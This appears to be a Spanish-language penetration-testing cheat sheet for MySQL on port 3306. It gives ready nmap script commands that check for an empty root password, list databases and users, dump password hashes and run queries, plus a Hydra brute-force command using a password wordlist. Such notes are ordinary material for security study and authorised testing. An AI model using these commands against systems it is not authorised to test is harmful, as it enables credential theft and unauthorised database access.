MySQL (3306)

MySQL es un sistema de gestión de bases de datos relacional de código abierto. Es ampliamente utilizado para almacenar, gestionar y recuperar datos en diversas aplicaciones, desde sitios web hasta sistemas empresariales. MySQL es conocido por su alta performance, escalabilidad, y confiabilidad. Ofrece soporte para múltiples usuarios y transacciones simultáneas, y utiliza el lenguaje SQL (Structured Query Language) para la gestión de los datos. MySQL es compatible con numerosas plataformas y se integra fácilmente con lenguajes de programación como PHP, Java y Python.

Nmap

Scripts de nmap utiles para este servicio:

• mysql-empty-password

• mysql-info

• mysql-databases

• mysql-users

• mysql-variables

• mysql-dump-hashes

• mysql-audit

Comprobar si el password de root es vacío.

nmap --script=mysql-empty-password -p 3306 192.168.1.10

nmap --script=mysql-info -p 3306 192.168.1.10

Lista las base de datos

nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10

Lista los usuarios de la base de datos

nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10

nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10

Dump hashes

nmap --script=mysql-dump-hashes --script-args="username='root',password=''" -p 3306 192.168.1.10

nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" 192.168.1.10 -vvv

Ejecuta una consulta

nmap -p 3306 --script=mysql-query --script-args="query='select * from books.authors;',username='root',password=''" 192.168.1.10 -vvv

Hydra

hydra -l root -P /usr/share/metasploit-framework/data/wordlist/unix_passwords.txt mysql://192.168.1.10 mysql